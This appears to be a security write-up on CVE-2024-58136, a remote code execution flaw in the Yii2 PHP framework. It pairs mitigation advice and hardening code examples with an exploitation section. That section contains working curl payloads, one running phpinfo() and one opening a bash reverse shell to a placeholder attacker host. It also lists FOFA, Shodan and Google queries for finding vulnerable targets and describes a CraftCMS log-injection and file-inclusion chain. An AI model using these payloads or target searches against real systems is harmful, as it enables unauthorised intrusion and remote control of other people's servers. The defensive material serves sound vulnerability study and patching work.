From Behaviors to Shells: Exploiting CVE-2024-58136 in Yii2 PHP Framework
Overview
CVE-2024-58136 is a critical remote code execution (RCE) vulnerability affecting the Yii2 PHP framework. This flaw allows attackers to instantiate arbitrary PHP classes with controlled parameters by exploiting the framework's behavior attachment mechanism, leading to potential RCE.
Understanding the Vulnerability
Yii2 permits developers to attach behaviors to components using the "as <name>" syntax. When behaviors are defined via JSON input, especially with yii\web\JsonParser enabled, an attacker can supply a structure like:
{
"as hack": {
"__class": "ArbitraryClass",
"class": "ValidBehavior",
"payload": "..."
}
}
In versions prior to 2.0.52, Yii2 checks only the "class" key to ensure it subclasses yii\base\Behavior, but it still instantiates the class specified in "__class". Because the validated class and the instantiated class can differ, an attacker can execute arbitrary code by naming a PHP class whose constructor or destructor performs dangerous operations.
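The mismatch described above, as an added illustration that is not Yii's own code: a deliberately simplified model of a behavior resolver in which the subclass check inspects the "class" key while instantiation uses "__class", placed beside a hardened version that validates exactly the class it will create. The class names (Behavior, SafeBehavior, NotABehavior) and both functions are constructed for this demonstration; nothing here calls Yii. Requires PHP 8.0 or later.

```php
<?php
// Added illustration for this section; it is NOT Yii's code. It models the
// mismatch the post describes: the subclass check looks at one key ("class")
// while instantiation uses another ("__class"). All class names are constructed.

abstract class Behavior {            // stand-in for yii\base\Behavior
    public string $attribute = '';
}
final class SafeBehavior extends Behavior {}

// Stand-in for any class whose constructor or destructor has side effects.
final class NotABehavior {
    public function __construct(public string $payload = '') {}
    public function __destruct() { echo "destructor ran with: {$this->payload}\n"; }
}

/** Vulnerable pattern: validates "class", but instantiates "__class" when present. */
function attachBehaviorVulnerable(array $config): object
{
    if (!is_subclass_of($config['class'] ?? '', Behavior::class)) {
        throw new InvalidArgumentException('not a behavior');
    }
    $className = $config['__class'] ?? $config['class'];   // never checked
    unset($config['__class'], $config['class']);
    $object = new $className();
    foreach ($config as $name => $value) {
        $object->$name = $value;
    }
    return $object;
}

/** Hardened pattern: refuse overrides and validate the exact class being created. */
function attachBehaviorHardened(array $config): Behavior
{
    if (array_key_exists('__class', $config)) {
        throw new InvalidArgumentException('"__class" is not allowed in behavior config');
    }
    $className = $config['class'] ?? '';
    if (!is_string($className) || !is_subclass_of($className, Behavior::class)) {
        throw new InvalidArgumentException('not a behavior');
    }
    unset($config['class']);
    $object = new $className();
    foreach ($config as $name => $value) {
        if (!property_exists($object, $name)) {          // no dynamic properties
            throw new InvalidArgumentException("unknown property $name");
        }
        $object->$name = $value;
    }
    return $object;
}

// Constructed input in the shape the post shows, with harmless stand-in classes.
$untrusted = json_decode(
    '{"__class":"NotABehavior","class":"SafeBehavior","payload":"demo"}',
    true
);

$obj = attachBehaviorVulnerable($untrusted);
echo 'vulnerable path created: ', get_class($obj), "\n";   // NotABehavior
unset($obj);                                               // destructor fires here

try {
    attachBehaviorHardened($untrusted);
} catch (InvalidArgumentException $e) {
    echo 'hardened path rejected: ', $e->getMessage(), "\n";
}

$benign = ['class' => 'SafeBehavior', 'attribute' => 'title'];
echo 'hardened path accepted: ', get_class(attachBehaviorHardened($benign)), "\n";
```

The point of the hardened version is that the class name passed to is_subclass_of() is the same string handed to new, and that no alternative key can substitute a different class after the check has passed; rejecting unknown properties additionally keeps attacker-chosen names from reaching setters or dynamic properties on the created object.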
Exploitation Techniques
1. Executing phpinfo()
To test for RCE, an attacker can send a POST request with a payload that triggers phpinfo():
curl -k -X POST https://target/index.php \
-H "Content-Type: application/json" \
-d '{"as hack": {"__class": "GuzzleHttp\\\\Psr7\\\\FnStream", "class": "yii\\\\behaviors\\\\AttributeBehavior", "__construct()": [[]], "_fn_close": "phpinfo"}}'
If successful, the response will contain the output of phpinfo(), confirming code execution.
2. Establishing a Reverse Shell
An attacker can gain a reverse shell by sending a payload that executes a system command:
curl -k -X POST https://target/index.php \
-H "Content-Type: application/json" \
-d '{"as hack": {"__class": "GuzzleHttp\\\\Psr7\\\\FnStream", "class": "yii\\\\behaviors\\\\AttributeBehavior", "__construct()": [[]], "_fn_close": "system", "stream": "bash -c '\''bash -i >& /dev/tcp/attacker_ip/port 0>&1'\''"}}'
This command initiates a reverse shell connection to the attacker's machine.
Target Discovery Methods
FOFA Queries
To identify potential targets:
title="yii" || header="X-Powered-By: Yii"
Refine by country or port as needed.
Shodan Queries
Search for Yii-powered applications:
http.headers:"X-Powered-By: Yii"
Further refine using known favicon hashes or other headers.
Google Dorks
Utilize specific search queries:
intext:"powered by Yii Framework" inurl:/index.php
intext:"CraftSessionId"
"powered by Yii Framework" intitle:index.of
Advanced Exploitation in CraftCMS
When CraftCMS (built on Yii2) is in use, attackers can chain vulnerabilities for RCE:
Step 1: Log Injection
Inject a reverse shell payload via a cookie or error page, causing it to be logged.
Step 2: Trigger Log-Based LFI
Use PhpManager to include the log file containing the payload:
{
"as hack": {
"__class": "yii\\rbac\\PhpManager",
"class": "yii\\behaviors\\AttributeBehavior",
"itemFile": "/path/to/log/file.log"
}
}
This inclusion executes the injected PHP code, resulting in RCE.
Mitigation Strategies
Upgrade Yii2: Update to version 2.0.52 or later, which addresses this vulnerability.
Input Validation: Implement strict validation to prevent untrusted JSON inputs from containing keys like "__class", "as", or "on".
Web Application Firewall (WAF): Deploy a WAF to detect and block malicious payloads targeting this vulnerability.
Avoid Raw JSON Parsing: Refrain from accepting raw JSON from untrusted sources, especially when using yii\web\JsonParser.
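The input-validation and payload-detection points above, worked as an added example that is not part of the original post and not Yii code: a guard that decodes an untrusted request body with a depth limit, walks the result, and rejects any key that would be read as a configuration directive. The key patterns are taken from the post's mitigation list ("__class", "as ", "on ") plus the "name()" method-call form visible in the post's payloads; the function names, the depth constant, and the sample bodies are constructed here. Wiring it in front of yii\web\JsonParser, or into a WAF rule, is left to the deployment; the block runs stand-alone on PHP 8.0 or later.

```php
<?php
// Added example, not part of the original post and not Yii code: a guard that
// inspects untrusted JSON before it can reach component configuration. The key
// patterns come from the post's mitigation list (__class, "as ", "on ") plus the
// method-call form ("name()") seen in the post's payloads.

const MAX_JSON_DEPTH = 32;   // constructed limit for this demo

/** Returns true if a key would be interpreted as a configuration directive. */
function isConfigDirectiveKey(string $key): bool
{
    return $key === '__class'
        || str_starts_with($key, 'as ')
        || str_starts_with($key, 'on ')
        || str_ends_with($key, '()');
}

/**
 * Recursively walks decoded JSON and returns the JSON-pointer-like path of
 * the first offending key, or null when the document is clean.
 */
function findConfigDirective(mixed $node, string $path = ''): ?string
{
    if (!is_array($node)) {
        return null;
    }
    foreach ($node as $key => $value) {
        $here = $path . '/' . $key;
        if (is_string($key) && isConfigDirectiveKey($key)) {
            return $here;
        }
        if (($hit = findConfigDirective($value, $here)) !== null) {
            return $hit;
        }
    }
    return null;
}

/**
 * Decodes an untrusted request body. Throws on malformed JSON, excessive
 * nesting, or any configuration-style key; returns plain data otherwise.
 */
function parseUntrustedJson(string $body): array
{
    $data = json_decode($body, true, MAX_JSON_DEPTH, JSON_THROW_ON_ERROR);
    if (!is_array($data)) {
        throw new UnexpectedValueException('JSON body must be an object or array');
    }
    if (($path = findConfigDirective($data)) !== null) {
        // Log the key path, not the full body, so the log itself cannot become
        // a sink for attacker-controlled text (see the log-injection step above).
        error_log("rejected JSON body: configuration directive at $path");
        throw new UnexpectedValueException('request body contains a disallowed key');
    }
    return $data;
}

// Constructed samples: a benign update, a body shaped like the post's payload,
// and a directive hidden inside a nested array.
$samples = [
    'benign'  => '{"title":"hello","tags":["a","b"],"meta":{"as_of":"2024"}}',
    'hostile' => '{"as hack":{"__class":"X","class":"Y","__construct()":[[]]}}',
    'nested'  => '{"items":[{"name":"ok"},{"on afterSave":"x"}]}',
];

foreach ($samples as $label => $body) {
    try {
        $data = parseUntrustedJson($body);
        echo "$label: accepted (", count($data), " top-level keys)\n";
    } catch (UnexpectedValueException | JsonException $e) {
        echo "$label: rejected: ", $e->getMessage(), "\n";
    }
}
```

Running it accepts the benign body (the "as_of" key has no trailing space after "as", so it is not matched), rejects the hostile body at "/as hack", and rejects the nested body at "/items/1/on afterSave". Matching on exact prefixes keeps false positives low; if an application needs stricter handling, the same walker can be pointed at a whitelist of expected keys instead of a blocklist of known-bad ones.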
Conclusion
CVE-2024-58136 poses a significant threat to applications using vulnerable versions of Yii2. By understanding the exploitation methods and implementing the recommended mitigations, developers can protect their applications from potential attacks.